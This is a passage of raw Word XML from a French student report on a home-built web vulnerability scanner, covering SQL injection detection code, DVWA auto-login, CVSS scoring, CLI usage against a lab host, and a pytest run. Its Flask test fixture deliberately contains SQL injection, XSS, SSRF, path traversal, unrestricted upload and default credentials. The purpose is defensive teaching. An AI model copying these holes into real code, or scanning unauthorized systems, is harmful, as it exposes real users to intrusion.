        <w:t xml:space="preserve">            if self._test_error_based(endpoint, param, method, base, vulns): continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if self._test_time_based(endpoint, param, method, base, baseline, vulns): continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">            self._test_boolean_based(endpoint, param, method, base, baseline, vulns)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return vulns</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    def _test_error_based(self, endpoint, param, method, base, vulns) -&gt; bool:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for payload in self.payloads:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            data = {**base, param: payload}</w:t>
        <w:br/>
        <w:t xml:space="preserve">            resp = self._send(endpoint.url, method=method,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                              params=data if method=="GET" else None,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                              data=data if method!="GET" else None)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if resp and (m := ERROR_REGEX.search(resp.text)):</w:t>
        <w:br/>
        <w:t xml:space="preserve">                vulns.append(Vulnerability(name=self.name, owasp_id=self.owasp_id,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    url=endpoint.url, parameter=param, payload=payload,</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    evidence=f"Erreur SQL : '{m.group(0)}'", method=method))</w:t>
        <w:br/>
        <w:t xml:space="preserve">                return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return False</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    def _test_time_based(self, endpoint, param, method, base, baseline, vulns) -&gt; bool:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for payload in TIME_PAYLOADS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            data = {**base, param: payload}</w:t>
        <w:br/>
        <w:t xml:space="preserve">            t0 = time.perf_counter()</w:t>
        <w:br/>
        <w:t xml:space="preserve">            resp = self._send(endpoint.url, method=method, data=data)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            elapsed = time.perf_counter() - t0</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if resp and elapsed &gt;= self.TIME_THRESHOLD and elapsed &gt; baseline + 3:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                vulns.append(Vulnerability(name=self.name, owasp_id=self.owasp_id,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    url=endpoint.url, parameter=param, payload=payload,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    evidence=f"Délai {elapsed:.2f}s (ref {baseline:.2f}s)", method=method))</w:t>
        <w:br/>
        <w:t xml:space="preserve">                return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D1320" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.2.4  Authenticator (scanner/authenticator.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F39288" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le module Authenticator gère deux modes d'authentification : le mode DVWA (login spécialisé avec gestion du token CSRF user_token de DVWA et réglage du niveau de sécurité) et le mode générique (détection automatique du formulaire de login et soumission des credentials).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3549586E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Fonction login_dvwa() (scanner/authenticator.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D23273"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def login_dvwa(session, base_url, username="admin", password="password",</w:t>
        <w:br/>
        <w:t xml:space="preserve">               security="low", timeout=10) -&gt; bool:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    login_url = base_url.rstrip("/") + "/login.php"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 1) Récupérer le token CSRF</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r = session.get(login_url, timeout=timeout)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    soup = BeautifulSoup(r.text, "html.parser")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    token = ""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if inp := soup.find("input", {"name": "user_token"}):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        token = inp.get("value", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 2) Soumettre le formulaire</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resp = session.post(login_url, data={</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "username": username, "password": password,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "Login": "Login", "user_token": token</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }, timeout=timeout)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    success = "logout" in resp.text.lower() or "welcome" in resp.text.lower()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if success and security != "":</w:t>
        <w:br/>
        <w:t xml:space="preserve">        # 3) Régler le niveau de sécurité DVWA</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sec_url = base_url.rstrip("/") + "/security.php"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sr = session.get(sec_url, timeout=timeout)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        soup2 = BeautifulSoup(sr.text, "html.parser")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        t2 = soup2.find("input", {"name": "user_token"})</w:t>
        <w:br/>
        <w:t xml:space="preserve">        token2 = t2.get("value", "") if t2 else ""</w:t>
        <w:br/>
        <w:t xml:space="preserve">        session.post(sec_url, data={"seclev_submit": "Submit",</w:t>
        <w:br/>
        <w:t xml:space="preserve">            "security": security, "user_token": token2}, timeout=timeout)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE65259" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.2.5  CVSSEvaluator (evaluator/cvss.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F201BC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Code : CVSSEvaluator avec profils CVSS (evaluator/cvss.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C398E98"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CVSS_PROFILES: dict[str, CVSSProfile] = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "SQL Injection": CVSSProfile(</w:t>
        <w:br/>
        <w:t xml:space="preserve">        vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", score=9.8,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        recommendation="Requêtes paramétrées (prepared statements) obligatoires..."),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Cross-Site Scripting": CVSSProfile(</w:t>
        <w:br/>
        <w:t xml:space="preserve">        vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", score=6.1,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        recommendation="Encodage contextuel + Content-Security-Policy stricte..."),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "SSRF": CVSSProfile(</w:t>
        <w:br/>
        <w:t xml:space="preserve">        vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", score=8.5,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        recommendation="Allowlist IPs + blocage RFC 1918 + métadonnées cloud..."),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Authentication Failures": CVSSProfile(</w:t>
        <w:br/>
        <w:t xml:space="preserve">        vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", score=9.8,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        recommendation="Interdire credentials par défaut + MFA + rate limiting..."),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ... 8 autres profils (IDOR, Path Traversal, XXE, File Upload, ...)</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>def get_severity(score: float) -&gt; str:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if score &gt;= 9.0: return "Critique"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if score &gt;= 7.0: return "Élevé"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if score &gt;= 4.0: return "Moyen"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if score &gt; 0.0:  return "Faible"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "Aucun"</w:t>
        <w:br/>
        <w:br/>
        <w:t>class CVSSEvaluator:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def evaluate(self, vuln: Vulnerability) -&gt; Vulnerability:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        profile = CVSS_PROFILES.get(vuln.name)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if profile:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            vuln.cvss_score  = profile.score</w:t>
        <w:br/>
        <w:t xml:space="preserve">            vuln.cvss_vector = profile.vector</w:t>
        <w:br/>
        <w:t xml:space="preserve">            vuln.recommendation = vuln.recommendation or profile.recommendation</w:t>
        <w:br/>
        <w:t xml:space="preserve">        else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            vuln.cvss_score = 5.0</w:t>
        <w:br/>
        <w:t xml:space="preserve">            vuln.cvss_vector = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        vuln.severity = get_severity(vuln.cvss_score)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77203C73"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3.3  Interface en Ligne de Commande (CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABC02E3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'interface CLI est construite avec argparse. Elle expose toutes les options de configuration du scanner, affiche une bannière ASCII à chaque exécution, et produit un résumé des résultats en console à la fin du scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C782BA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Aide CLI complète du scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EEDF41"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python main.py --help</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve"> ____   __        __    _    ____  ____   _____            _     _  ___</w:t>
        <w:br/>
        <w:t>/ __ \  \ \      / /   / \  / ___||  _ \ |_   _|___  _ __ / |   / |/ _ \</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t xml:space="preserve">         Scanner de Vulnerabilites Web -- PFA EMSI 2024-2025</w:t>
        <w:br/>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t>usage: main.py [-h] --url URL [--output OUTPUT] [--depth DEPTH]</w:t>
        <w:br/>
        <w:t xml:space="preserve">               [--timeout TIMEOUT] [--max-pages MAX_PAGES] [--only ONLY]</w:t>
        <w:br/>
        <w:t xml:space="preserve">               [--cookie COOKIE] [--dvwa] [--login-url LOGIN_URL]</w:t>
        <w:br/>
        <w:t xml:space="preserve">               [--username USERNAME] [--password PASSWORD]</w:t>
        <w:br/>
        <w:t xml:space="preserve">               [--dvwa-security {low,medium,high,impossible}] [-v]</w:t>
        <w:br/>
        <w:br/>
        <w:t>Options:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --url URL             URL cible du scan (obligatoire)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --output OUTPUT       Rapport HTML de sortie (défaut: rapport.html)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --depth DEPTH         Profondeur de crawl (défaut: 2)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --timeout TIMEOUT     Timeout HTTP secondes (défaut: 10)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --max-pages MAX_PAGES Pages max à crawler (défaut: 100)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --only ONLY           Détecteurs: sqli,xss,ssrf,idor,path_traversal,xxe...</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --cookie COOKIE       Cookie de session : 'PHPSESSID=abc; security=low'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --dvwa                Auto-login DVWA (admin/password) + security=low</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --login-url URL       URL formulaire login (mode générique)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --username / --password   Credentials pour auto-login</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --dvwa-security       Niveau DVWA: low|medium|high|impossible</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v, --verbose         Logs détaillés (DEBUG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F7979A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Exemples d'utilisation du scanner en ligne de commande</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FEAB9"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 Exemples d'utilisation</w:t>
        <w:br/>
        <w:br/>
        <w:t># 1. Scan complet de DVWA (auto-login)</w:t>
        <w:br/>
        <w:t>python main.py --url http://192.168.56.102/dvwa --dvwa --output rapport_dvwa.html</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. Scan ciblé SQLi + XSS uniquement, profondeur 1, verbose</w:t>
        <w:br/>
        <w:t>python main.py --url http://192.168.56.102/dvwa --dvwa \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --only sqli,xss --depth 1 -v</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve"># 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scan avec cookie de session existant</w:t>
        <w:br/>
        <w:t>python main.py --url http://192.168.56.102/dvwa \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --cookie "PHPSESSID=abc123; security=low" --depth 3</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve"># 4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Scan d'application tierce avec login générique</w:t>
        <w:br/>
        <w:t>python main.py --url http://192.168.56.102/webapp \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --login-url http://192.168.56.102/webapp/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --username admin --password secret \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               --only sqli,xss,ssrf,auth --output rapport_webapp.html</w:t>
        <w:br/>
        <w:br/>
        <w:t># Résumé console en fin de scan :</w:t>
        <w:br/>
        <w:t>============================================================</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Scan terminé en 6.04s</w:t>
        <w:br/>
        <w:t>============================================================</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Total vulnérabilités : 70</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - Critique    : 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - Élevé       : 6</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - Moyen       : 62</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Rapport HTML : /path/to/rapport.html</w:t>
        <w:br/>
        <w:t>===========================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CBE1B"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3.4  Suite de Tests Unitaires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5F83C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4.1  Application Flask Vulnérable (conftest.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D40FB54" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La fixture conftest.py crée une application Flask intentionnellement vulnérable qui est lancée en mémoire via un thread daemon pour la durée des tests. Cette approche rend les tests autonomes (pas besoin de DVWA ou de réseau externe) et reproductibles. L'application expose délibérément toutes les vulnérabilités que notre scanner doit détecter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F67DB6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Code : Application Flask vulnérable — fixture de test (tests/conftest.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4191CC" w14:textId="77777777" w:rsidR="006A6D93"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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>def create_vulnerable_app():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    app = Flask(__name__)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    @app.route("/search")                          # SQLi</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def search():</w:t>
        <w:br/>
        <w:t xml:space="preserve">        q = request.args.get("q", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            conn = sqlite3.connect(":memory:")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            conn.execute(f"SELECT * FROM users WHERE name='{q}'")  # VULNÉRABLE</w:t>
        <w:br/>
        <w:t xml:space="preserve">        except sqlite3.OperationalError as e:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return f"Error: {e}", 500</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "OK"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    @app.route("/greet")                           # XSS réfléchi</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def greet():</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name = request.args.get("name", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return f"&lt;h1&gt;Hello {name}&lt;/h1&gt;"            # PAS d'échappement</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    @app.route("/fetch")                           # SSRF</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def fetch():</w:t>
        <w:br/>
        <w:t xml:space="preserve">        url = request.args.get("url", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        resp = requests.get(url, timeout=5)        # VULNÉRABLE</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return resp.text</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    @app.route("/file")                            # Path Traversal</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def serve_file():</w:t>
        <w:br/>
        <w:t xml:space="preserve">        page = request.args.get("page", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with open(page, "r") as f:                 # PAS de validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return f.read()</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    @app.route("/upload", methods=["POST"])        # File Upload</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def upload():</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f = request.files.get("uploaded")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.save(os.path.join("uploads", f.filename))  # Pas de validation type</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "Uploaded"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    @app.route("/login", methods=["GET","POST"])   # Auth Failures + Crypto</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def login():                                   # Servi en HTTP (pas HTTPS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if request.method=="POST":</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if request.form.get("username")=="admin" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">               and request.form.get("password")=="admin":  # Credentials par défaut</w:t>
        <w:br/>
        <w:t xml:space="preserve">                return redirect("/dashboard")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return '''&lt;form method="POST"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            &lt;input name="username"&gt;&lt;input type="password" name="password"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            &lt;button&gt;Login&lt;/button&gt;&lt;/form&gt;'''</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">    return app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D83216A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.4.2  Résultats de la Suite pytest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5C556" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La suite complète de 26 tests couvre tous les modules du scanner. Les tests d'intégration lancent réellement le scanner contre l'application Flask vulnérable et vérifient que les vulnérabilités sont bien détectées. Les tests unitaires vérifient les calculs CVSS, le crawl BFS et la génération HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04904851" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C696C4" wp14:editId="1592A2E4">
            <wp:extent cx="5029200" cy="28320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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="2832068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32F743" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRPr="003325EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Figure 3 — Exécution du scanner sur DVWA : Login OK, 43 pages, 128 vulnérabilités détectées en 9.10s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744482C7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultats complets de la suite pytest (26 tests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A0A67"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rPr>
        <w:t>$ cd imple &amp;&amp; pytest -v --tb=short</w:t>
        <w:br/>
        <w:t>========================= test session starts ==========================</w:t>
        <w:br/>
        <w:t>Platform: linux -- Python 3.11.6, pytest-7.4.3</w:t>
        <w:br/>
        <w:t>Collected 26 items</w:t>
        <w:br/>
        <w:br/>
        <w:t>tests/test_detectors.py::test_sqli_error_based_detected         PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_sqli_time_based_detected          PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_sqli_boolean_detected             PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_xss_reflected_detected            PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_xss_stored_detected               PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_ssrf_internal_detected            PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_ssrf_cloud_metadata_detected      PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_path_traversal_detected           PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_path_traversal_encoded_bypass     PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_xxe_local_file_detected           PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_idor_user_enumeration             PASSED</w:t>
        <w:br/>
        <w:t>tests/test_detectors.py::test_idor_invoice_access               PASSED</w:t>
        <w:br/>
        <w:t>tests/test_cvss.py::test_sqli_score_is_9_8                      PASSED</w:t>
        <w:br/>
        <w:t>tests/test_cvss.py::test_xss_score_is_6_1                       PASSED</w:t>
        <w:br/>
